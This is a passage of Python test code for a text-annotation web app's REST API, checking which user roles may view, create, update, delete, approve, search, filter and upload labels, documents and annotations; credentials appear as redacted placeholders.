email='<EMAIL>')
project = mommy.make('Project', users=[project_member, super_user])
cls.label = mommy.make('Label', project=project)
cls.label_with_shortcut = mommy.make('Label', suffix_key='l', project=project)
cls.url = reverse(viewname='label_detail', args=[project.id, cls.label.id])
cls.url_with_shortcut = reverse(viewname='label_detail', args=[project.id, cls.label_with_shortcut.id])
cls.data = {'text': 'example'}
create_default_roles()
assign_user_to_role(project_member=project_member, project=project,
role_name=settings.ROLE_ANNOTATOR)
def test_returns_label_to_project_member(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.data['id'], self.label.id)
def test_do_not_return_label_to_non_project_member(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_superuser_to_update_label(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
response = self.client.patch(self.url, format='json', data=self.data)
self.assertEqual(response.data['text'], self.data['text'])
def test_allows_superuser_to_update_label_with_shortcut(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
response = self.client.patch(self.url_with_shortcut, format='json', data={'suffix_key': 's'})
self.assertEqual(response.data['suffix_key'], 's')
def test_disallows_project_member_to_update_label(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.patch(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_superuser_to_delete_label(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_disallows_project_member_to_delete_label(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestLabelUploadAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>'
create_default_roles()
project_member = User.objects.create_user(username=cls.project_member_name,
password=<PASSWORD>member_<PASSWORD>)
User.objects.create_user(username=cls.non_project_member_name, password=<PASSWORD>.non_project_member_<PASSWORD>)
project_admin = User.objects.create_user(username=cls.super_user_name,
password=<PASSWORD>)
project = mommy.make('Project', users=[project_member, project_admin])
cls.url = reverse(viewname='label_upload', args=[project.id])
create_default_roles()
assign_user_to_role(project_member=project_admin, project=project, role_name=settings.ROLE_PROJECT_ADMIN)
assign_user_to_role(project_member=project_member, project=project, role_name=settings.ROLE_ANNOTATOR)
def help_to_upload_file(self, filename, expected_status):
with open(os.path.join(DATA_DIR, filename), 'rb') as f:
response = self.client.post(self.url, data={'file': f})
self.assertEqual(response.status_code, expected_status)
def test_allows_project_admin_to_upload_label(self):
self.client.login(username=self.super_user_name,
password=self.super_<PASSWORD>_<PASSWORD>)
self.help_to_upload_file('valid_labels.json', status.HTTP_201_CREATED)
def test_disallows_project_member_to_upload_label(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
self.help_to_upload_file('valid_labels.json', status.HTTP_403_FORBIDDEN)
def test_try_to_upload_invalid_file(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
self.help_to_upload_file('invalid_labels.json', status.HTTP_400_BAD_REQUEST)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestDocumentListAPI(APITestCase, TestUtilsMixin):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>'
create_default_roles()
project_member = User.objects.create_user(username=cls.project_member_name,
password=<PASSWORD>)
non_project_member = User.objects.create_user(username=cls.non_project_member_name,
password=<PASSWORD>.non_project_member_<PASSWORD>)
super_user = User.objects.create_superuser(username=cls.super_user_name,
password=<PASSWORD>,
email='<EMAIL>')
cls.main_project = mommy.make('TextClassificationProject', users=[project_member, super_user])
doc1 = mommy.make('Document', project=cls.main_project)
doc2 = mommy.make('Document', project=cls.main_project)
mommy.make('Document', project=cls.main_project)
cls.random_order_project = mommy.make('TextClassificationProject', users=[project_member, super_user],
randomize_document_order=True)
mommy.make('Document', 100, project=cls.random_order_project)
sub_project = mommy.make('TextClassificationProject', users=[non_project_member])
mommy.make('Document', project=sub_project)
cls.url = reverse(viewname='doc_list', args=[cls.main_project.id])
cls.random_order_project_url = reverse(viewname='doc_list', args=[cls.random_order_project.id])
cls.data = {'text': 'example'}
assign_user_to_role(project_member=project_member, project=cls.main_project,
role_name=settings.ROLE_ANNOTATOR)
assign_user_to_role(project_member=project_member, project=cls.random_order_project,
role_name=settings.ROLE_ANNOTATOR)
mommy.make('DocumentAnnotation', document=doc1, user=project_member)
mommy.make('DocumentAnnotation', document=doc2, user=project_member)
def _test_list(self, url, username, password, expected_num_results):
self.client.login(username=username, password=password)
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.json().get('results')), expected_num_results)
def test_returns_docs_to_project_member(self):
self._test_list(self.url,
username=self.project_member_name,
password=<PASSWORD>,
expected_num_results=3)
def test_returns_docs_to_project_member_filtered_to_active(self):
self._test_list('{}?doc_annotations__isnull=true'.format(self.url),
username=self.project_member_name,
password=<PASSWORD>,
expected_num_results=1)
def test_returns_docs_to_project_member_filtered_to_completed(self):
self._test_list('{}?doc_annotations__isnull=false'.format(self.url),
username=self.project_member_name,
password=<PASSWORD>,
expected_num_results=2)
def test_returns_docs_to_project_member_filtered_to_active_with_collaborative_annotation(self):
self._test_list('{}?doc_annotations__isnull=true'.format(self.url),
username=self.super_user_name,
password=<PASSWORD>,
expected_num_results=3)
self._patch_project(self.main_project, 'collaborative_annotation', True)
self._test_list('{}?doc_annotations__isnull=true'.format(self.url),
username=self.super_user_name,
password=self.super_<PASSWORD>_<PASSWORD>,
expected_num_results=1)
def test_returns_docs_to_project_member_filtered_to_completed_with_collaborative_annotation(self):
self._test_list('{}?doc_annotations__isnull=false'.format(self.url),
username=self.super_user_name,
password=<PASSWORD>,
expected_num_results=0)
self._patch_project(self.main_project, 'collaborative_annotation', True)
self._test_list('{}?doc_annotations__isnull=false'.format(self.url),
username=self.super_user_name,
password=<PASSWORD>,
expected_num_results=2)
def test_returns_docs_in_consistent_order_for_all_users(self):
self.client.login(username=self.project_member_name, password=<PASSWORD>)
user1_documents = self.client.get(self.url, format='json').json().get('results')
self.client.logout()
self.client.login(username=self.super_user_name, password=self.<PASSWORD>)
user2_documents = self.client.get(self.url, format='json').json().get('results')
self.client.logout()
self.assertEqual([doc['id'] for doc in user1_documents], [doc['id'] for doc in user2_documents])
def test_can_return_docs_in_consistent_random_order(self):
self.client.login(username=self.project_member_name, password=<PASSWORD>.project_member_<PASSWORD>)
user1_documents1 = self.client.get(self.random_order_project_url, format='json').json().get('results')
user1_documents2 = self.client.get(self.random_order_project_url, format='json').json().get('results')
self.client.logout()
self.assertEqual(user1_documents1, user1_documents2)
self.client.login(username=self.super_user_name, password=self.super_user_pass)
user2_documents1 = self.client.get(self.random_order_project_url, format='json').json().get('results')
user2_documents2 = self.client.get(self.random_order_project_url, format='json').json().get('results')
self.client.logout()
self.assertEqual(user2_documents1, user2_documents2)
self.assertNotEqual(user1_documents1, user2_documents1)
self.assertNotEqual(user1_documents2, user2_documents2)
def test_do_not_return_docs_to_non_project_member(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_do_not_return_docs_of_other_projects(self):
self._test_list(self.url,
username=self.project_member_name,
password=self.project_member_pass,
expected_num_results=self.main_project.documents.count())
def test_allows_superuser_to_create_doc(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
response = self.client.post(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_disallows_project_member_to_create_doc(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.post(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestDocumentDetailAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>'
create_default_roles()
project_member = User.objects.create_user(username=cls.project_member_name,
password=<PASSWORD>)
non_project_member = User.objects.create_user(username=cls.non_project_member_name,
password=cls.non_project_member_pass)
# Todo: change super_user to project_admin.
super_user = User.objects.create_superuser(username=cls.super_user_name,
password=<PASSWORD>,
email='<EMAIL>')
project = mommy.make('TextClassificationProject', users=[project_member, super_user])
cls.doc = mommy.make('Document', project=project)
cls.url = reverse(viewname='doc_detail', args=[project.id, cls.doc.id])
cls.data = {'text': 'example'}
assign_user_to_role(project_member=project_member, project=project,
role_name=settings.ROLE_ANNOTATOR)
def test_returns_doc_to_project_member(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.data['id'], self.doc.id)
def test_do_not_return_doc_to_non_project_member(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_superuser_to_update_doc(self):
self.client.login(username=self.super_user_name,
password=<PASSWORD>)
response = self.client.patch(self.url, format='json', data=self.data)
self.assertEqual(response.data['text'], self.data['text'])
def test_disallows_project_member_to_update_doc(self):
self.client.login(username=self.project_member_name,
password=<PASSWORD>)
response = self.client.patch(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_superuser_to_delete_doc(self):
self.client.login(username=self.super_user_name,
password=<PASSWORD>)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_disallows_project_member_to_delete_doc(self):
self.client.login(username=self.project_member_name,
password=self.<PASSWORD>)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestApproveLabelsAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.annotator_name = 'annotator_name'
cls.annotator_pass = '<PASSWORD>'
cls.approver_name = 'approver_name_name'
cls.approver_pass = '<PASSWORD>'
cls.project_admin_name = 'project_admin_name'
cls.project_admin_pass = '<PASSWORD>'
annotator = User.objects.create_user(username=cls.annotator_name,
password=cls.annotator_pass)
approver = User.objects.create_user(username=cls.approver_name,
password=cls.approver_pass)
project_admin = User.objects.create_user(username=cls.project_admin_name,
password=cls.project_admin_pass)
project = mommy.make('TextClassificationProject', users=[annotator, approver, project_admin])
cls.doc = mommy.make('Document', project=project)
cls.url = reverse(viewname='approve_labels', args=[project.id, cls.doc.id])
create_default_roles()
assign_user_to_role(project_member=annotator, project=project,
role_name=settings.ROLE_ANNOTATOR)
assign_user_to_role(project_member=approver, project=project,
role_name=settings.ROLE_ANNOTATION_APPROVER)
assign_user_to_role(project_member=project_admin, project=project,
role_name=settings.ROLE_PROJECT_ADMIN)
def test_allow_project_admin_to_approve_and_disapprove_labels(self):
self.client.login(username=self.project_admin_name, password=self.project_admin_pass)
response = self.client.post(self.url, format='json', data={'approved': True})
self.assertEqual(response.data['annotation_approver'], self.project_admin_name)
response = self.client.post(self.url, format='json', data={'approved': False})
self.assertIsNone(response.data['annotation_approver'])
def test_allow_approver_to_approve_and_disapprove_labels(self):
self.client.login(username=self.approver_name, password=<PASSWORD>_pass)
response = self.client.post(self.url, format='json', data={'approved': True})
self.assertEqual(response.data['annotation_approver'], self.approver_name)
response = self.client.post(self.url, format='json', data={'approved': False})
self.assertIsNone(response.data['annotation_approver'])
def test_disallows_non_annotation_approver_to_approve_and_disapprove_labels(self):
self.client.login(username=self.annotator_name, password=self.annotator_pass)
response = self.client.post(self.url, format='json', data={'approved': True})
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestAnnotationListAPI(APITestCase, TestUtilsMixin):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.another_project_member_name = 'another_project_member_name'
cls.another_project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
create_default_roles()
project_member = User.objects.create_user(username=cls.project_member_name,
password=cls.project_member_<PASSWORD>)
another_project_member = User.objects.create_user(username=cls.another_project_member_name,
password=cls.another_project_member_pass)
non_project_member = User.objects.create_user(username=cls.non_project_member_name,
password=cls.non_project_member_<PASSWORD>)
main_project = mommy.make('SequenceLabelingProject', users=[project_member, another_project_member])
main_project_label = mommy.make('Label', project=main_project)
main_project_doc = mommy.make('Document', project=main_project)
mommy.make('SequenceAnnotation', document=main_project_doc, user=project_member)
mommy.make('SequenceAnnotation', document=main_project_doc, user=another_project_member)
sub_project = mommy.make('SequenceLabelingProject', users=[non_project_member])
sub_project_doc = mommy.make('Document', project=sub_project)
mommy.make('SequenceAnnotation', document=sub_project_doc)
cls.classification_project = mommy.make('TextClassificationProject',
users=[project_member, another_project_member])
cls.classification_project_label_1 = mommy.make('Label', project=cls.classification_project)
cls.classification_project_label_2 = mommy.make('Label', project=cls.classification_project)
cls.classification_project_document = mommy.make('Document', project=cls.classification_project)
cls.classification_project_url = reverse(
viewname='annotation_list', args=[cls.classification_project.id, cls.classification_project_document.id])
assign_user_to_role(project_member=project_member, project=cls.classification_project,
role_name=settings.ROLE_ANNOTATOR)
assign_user_to_role(project_member=another_project_member, project=cls.classification_project,
role_name=settings.ROLE_ANNOTATOR)
cls.url = reverse(viewname='annotation_list', args=[main_project.id, main_project_doc.id])
cls.post_data = {'start_offset': 0, 'end_offset': 1, 'label': main_project_label.id}
cls.num_entity_of_project_member = SequenceAnnotation.objects.filter(document=main_project_doc,
user=project_member).count()
cls.num_entity_of_another_project_member = SequenceAnnotation.objects.filter(
document=main_project_doc,
user=another_project_member).count()
cls.main_project = main_project
assign_user_to_role(project_member=project_member, project=main_project,
role_name=settings.ROLE_ANNOTATOR)
def test_returns_annotations_to_project_member(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_do_not_return_annotations_to_non_project_member(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_do_not_return_annotations_of_another_project_member(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(len(response.data), self.num_entity_of_project_member)
def test_returns_annotations_of_another_project_member_if_collaborative_project(self):
self._patch_project(self.main_project, 'collaborative_annotation', True)
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(len(response.data),
self.num_entity_of_project_member + self.num_entity_of_another_project_member)
def test_allows_project_member_to_create_annotation(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.post(self.url, format='json', data=self.post_data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_disallows_non_project_member_to_create_annotation(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.post(self.url, format='json', data=self.post_data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_disallows_second_annotation_for_single_class_project(self):
self._patch_project(self.classification_project, 'single_class_classification', True)
self.client.login(username=self.project_member_name, password=<PASSWORD>member_<PASSWORD>)
response = self.client.post(self.classification_project_url, format='json',
data={'label': self.classification_project_label_1.id})
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
response = self.client.post(self.classification_project_url, format='json',
data={'label': self.classification_project_label_2.id})
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_disallows_second_annotation_for_single_class_shared_project(self):
self._patch_project(self.classification_project, 'single_class_classification', True)
self._patch_project(self.classification_project, 'collaborative_annotation', True)
self.client.login(username=self.project_member_name, password=<PASSWORD>)
response = self.client.post(self.classification_project_url, format='json',
data={'label': self.classification_project_label_1.id})
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.client.login(username=self.another_project_member_name, password=self.another_project_member_pass)
response = self.client.post(self.classification_project_url, format='json',
data={'label': self.classification_project_label_2.id})
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def _patch_project(self, project, attribute, value):
old_value = getattr(project, attribute, None)
setattr(project, attribute, value)
project.save()
def cleanup_project():
setattr(project, attribute, old_value)
project.save()
self.addCleanup(cleanup_project)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestAnnotationDetailAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>'
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.another_project_member_name = 'another_project_member_name'
cls.another_project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
# Todo: change super_user to project_admin.
super_user = User.objects.create_superuser(username=cls.super_user_name,
password=cls.super_user_<PASSWORD>,
email='<EMAIL>')
create_default_roles()
project_member = User.objects.create_user(username=cls.project_member_name,
password=<PASSWORD>member_<PASSWORD>)
another_project_member = User.objects.create_user(username=cls.another_project_member_name,
password=cls.another_project_member_pass)
non_project_member = User.objects.create_user(username=cls.non_project_member_name,
password=<PASSWORD>)
main_project = mommy.make('SequenceLabelingProject',
users=[super_user, project_member, another_project_member])
main_project_doc = mommy.make('Document', project=main_project)
main_project_entity = mommy.make('SequenceAnnotation',
document=main_project_doc, user=project_member)
another_entity = mommy.make('SequenceAnnotation',
document=main_project_doc, user=another_project_member)
shared_project = mommy.make('SequenceLabelingProject',
collaborative_annotation=True,
users=[project_member, another_project_member])
shared_project_doc = mommy.make('Document', project=shared_project)
shared_entity = mommy.make('SequenceAnnotation', document=shared_project_doc, user=another_project_member)
cls.url = reverse(viewname='annotation_detail', args=[main_project.id,
main_project_doc.id,
main_project_entity.id])
cls.another_url = reverse(viewname='annotation_detail', args=[main_project.id,
main_project_doc.id,
another_entity.id])
cls.shared_url = reverse(viewname='annotation_detail', args=[shared_project.id,
shared_project_doc.id,
shared_entity.id])
cls.post_data = {'start_offset': 0, 'end_offset': 10}
assign_user_to_role(project_member=project_member, project=main_project, role_name=settings.ROLE_ANNOTATOR)
assign_user_to_role(project_member=project_member, project=shared_project, role_name=settings.ROLE_ANNOTATOR)
def test_returns_annotation_to_project_member(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_do_not_return_annotation_to_non_project_member(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_do_not_return_annotation_by_another_project_member(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.another_url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_project_member_to_update_annotation(self):
self.client.login(username=self.project_member_name,
password=<PASSWORD>)
response = self.client.patch(self.url, format='json', data=self.post_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_disallows_non_project_member_to_update_annotation(self):
self.client.login(username=self.non_project_member_name,
password=<PASSWORD>)
response = self.client.patch(self.url, format='json', data=self.post_data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_disallows_project_member_to_update_annotation_of_another_member(self):
self.client.login(username=self.project_member_name,
password=<PASSWORD>)
response = self.client.patch(self.another_url, format='json', data=self.post_data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_superuser_to_delete_annotation_of_another_member(self):
self.client.login(username=self.super_user_name,
password=<PASSWORD>)
response = self.client.delete(self.another_url, format='json', data=self.post_data)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_allows_project_member_to_delete_annotation(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_disallows_project_member_to_delete_annotation(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_disallows_project_member_to_delete_annotation_of_another_member(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.delete(self.another_url, format='json', data=self.post_data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allow_member_to_update_others_annotation_in_shared_project(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.patch(self.shared_url, format='json', data=self.post_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_allow_member_to_delete_others_annotation_in_shared_project(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.delete(self.shared_url, format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestSearch(APITestCase):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
create_default_roles()
project_member = User.objects.create_user(username=cls.project_member_name,
password=cls.project_member_<PASSWORD>)
non_project_member = User.objects.create_user(username=cls.non_project_member_name,
password=cls.non_project_member_pass)
cls.main_project = mommy.make('TextClassificationProject', users=[project_member])
cls.search_term = 'example'
doc1 = mommy.make('Document', text=cls.search_term, project=cls.main_project)
doc2 = mommy.make('Document', text='Lorem', project=cls.main_project)
label1 = mommy.make('Label', project=cls.main_project)
label2 = mommy.make('Label', project=cls.main_project)
mommy.make('SequenceAnnotation', document=doc1, user=project_member, label=label1)
mommy.make('SequenceAnnotation', document=doc2, user=project_member, label=label2)
sub_project = mommy.make('TextClassificationProject', users=[non_project_member])
mommy.make('Document', text=cls.search_term, project=sub_project)
cls.url = reverse(viewname='doc_list', args=[cls.main_project.id])
cls.data = {'q': cls.search_term}
assign_user_to_role(project_member=project_member, project=cls.main_project,
role_name=settings.ROLE_ANNOTATOR)
def test_can_filter_doc_by_term(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json', data=self.data)
count = Document.objects.filter(text__contains=self.search_term,
project=self.main_project).count()
self.assertEqual(response.data['count'], count)
def test_can_order_doc_by_created_at_ascending(self):
params = {'ordering': 'created_at'}
self.client.login(username=self.project_member_name,
password=<PASSWORD>)
response = self.client.get(self.url, format='json', data=params)
docs = Document.objects.filter(project=self.main_project).order_by('created_at').values()
for d1, d2 in zip(response.data['results'], docs):
self.assertEqual(d1['id'], d2['id'])
def test_can_order_doc_by_created_at_descending(self):
params = {'ordering': '-created_at'}
self.client.login(username=self.project_member_name,
password=<PASSWORD>)
response = self.client.get(self.url, format='json', data=params)
docs = Document.objects.filter(project=self.main_project).order_by('-created_at').values()
for d1, d2 in zip(response.data['results'], docs):
self.assertEqual(d1['id'], d2['id'])
def test_can_order_doc_by_annotation_updated_at_ascending(self):
params = {'ordering': 'seq_annotations__updated_at'}
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json', data=params)
docs = Document.objects.filter(project=self.main_project).order_by('seq_annotations__updated_at').values()
for d1, d2 in zip(response.data['results'], docs):
self.assertEqual(d1['id'], d2['id'])
def test_can_order_doc_by_annotation_updated_at_descending(self):
params = {'ordering': '-seq_annotations__updated_at'}
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json', data=params)
docs = Document.objects.filter(project=self.main_project).order_by('-seq_annotations__updated_at').values()
for d1, d2 in zip(response.data['results'], docs):
self.assertEqual(d1['id'], d2['id'])
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestFilter(APITestCase):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
create_default_roles()
project_member = User.objects.create_user(username=cls.project_member_name,
password=cls.project_member_pass)
cls.main_project = mommy.make('SequenceLabelingProject', users=[project_member])
cls.label1 = mommy.make('Label', project=cls.main_project)
cls.label2 = mommy.make('Label', project=cls.main_project)
doc1 = mommy.make('Document', project=cls.main_project)
doc2 = mommy.make('Document', project=cls.main_project)
mommy.make('Document', project=cls.main_project)
mommy.make('SequenceAnnotation', document=doc1, user=project_member, label=cls.label1)
mommy.make('SequenceAnnotation', document=doc2, user=project_member, label=cls.label2)
cls.url = reverse(viewname='doc_list', args=[cls.main_project.id])
cls.params = {'seq_annotations__label__id': cls.label1.id}
assign_user_to_role(project_member=project_member, project=cls.main_project,
role_name=settings.ROLE_ANNOTATOR)
def test_can_filter_by_label(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json', data=self.params)
docs = Document.objects.filter(project=self.main_project,
seq_annotations__label__id=self.label1.id).values()
for d1, d2 in zip(response.data['results'], docs):
self.assertEqual(d1['id'], d2['id'])
def test_can_filter_doc_with_annotation(self):
params = {'seq_annotations__isnull': False}
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json', data=params)
docs = Document.objects.filter(project=self.main_project, seq_annotations__isnull=False).values()
self.assertEqual(response.data['count'], docs.count())
for d1, d2 in zip(response.data['results'], docs):
self.assertEqual(d1['id'], d2['id'])
def test_can_filter_doc_without_anotation(self):
params = {'seq_annotations__isnull': True}
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json', data=params)
docs = Document.objects.filter(project=self.main_project, seq_annotations__isnull=True).values()
self.assertEqual(response.data['count'], docs.count())
for d1, d2 in zip(response.data['results'], docs):
self.assertEqual(d1['id'], d2['id'])
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestUploader(APITestCase):
@classmethod
def setUpTestData(cls):
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>user_<PASSWORD>'
# Todo: change super_user to project_admin.
create_default_roles()
super_user = User.objects.create_superuser(username=cls.super_user_name,
password=<PASSWORD>,
email='<EMAIL>')
cls.classification_project = mommy.make('TextClassificationProject',
users=[super_user], project_type=DOCUMENT_CLASSIFICATION)
cls.labeling_project = mommy.make('SequenceLabelingProject',
users=[super_user], project_type=SEQUENCE_LABELING)
cls.seq2seq_project = mommy.make('Seq2seqProject', users=[super_user], project_type=SEQ2SEQ)
assign_user_to_role(project_member=super_user, project=cls.classification_project,
role_name=settings.ROLE_PROJECT_ADMIN)
assign_user_to_role(project_member=super_user, project=cls.labeling_project,
role_name=settings.ROLE_PROJECT_ADMIN)
assign_user_to_role(project_member=super_user, project=cls.seq2seq_project,
role_name=settings.ROLE_PROJECT_ADMIN)
def setUp(self):
self.client.login(username=self.super_user_name,
password=self.super_<PASSWORD>_pass)
def upload_test_helper(self, project_id, filename, file_format, expected_status, **kwargs):
url = reverse(viewname='doc_uploader', args=[project_id])
with open(os.path.join(DATA_DIR, filename), 'rb') as f:
response = self.client.post(url, data={'file': f, 'format': file_format})
self.assertEqual(response.status_code, expected_status)
def label_test_helper(self, project_id, expected_labels, expected_label_keys):
url = reverse(viewname='label_list', args=[project_id])
expected_keys = {key for label in expected_labels for key in label}
response = self.client.get(url).json()
actual_labels = [{key: value for (key, value) in label.items() if key in expected_keys}
for label in response]
self.assertCountEqual(actual_labels, expected_labels)
for label in response:
for expected_label_key in expected_label_keys:
self.assertIsNotNone(label.get(expected_label_key))
def test_can_upload_conll_format_file(self):
self.upload_test_helper(project_id=self.labeling_project.id,
filename='labeling.conll',
file_format='conll',
expected_status=status.HTTP_201_CREATED)
def test_cannot_upload_wrong_conll_format_file(self):
self.upload_test_helper(project_id=self.labeling_project.id,
filename='labeling.invalid.conll',
file_format='conll',
expected_status=status.HTTP_400_BAD_REQUEST)
def test_can_upload_classification_csv(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.csv',
file_format='csv',
expected_status=status.HTTP_201_CREATED)
def test_can_upload_classification_csv_with_out_of_order_columns(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example_out_of_order_columns.csv',
file_format='csv',
expected_status=status.HTTP_201_CREATED)
self.label_test_helper(
project_id=self.classification_project.id,
expected_labels=[
{'text': 'Positive'},
{'text': 'Negative'},
],
expected_label_keys=[],
)
def test_can_upload_csv_with_non_utf8_encoding(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.utf16.csv',
file_format='csv',
expected_status=status.HTTP_201_CREATED)
def test_can_upload_seq2seq_csv(self):
self.upload_test_helper(project_id=self.seq2seq_project.id,
filename='example.csv',
file_format='csv',
expected_status=status.HTTP_201_CREATED)
def test_can_upload_single_column_csv(self):
self.upload_test_helper(project_id=self.seq2seq_project.id,
filename='example_one_column.csv',
file_format='csv',
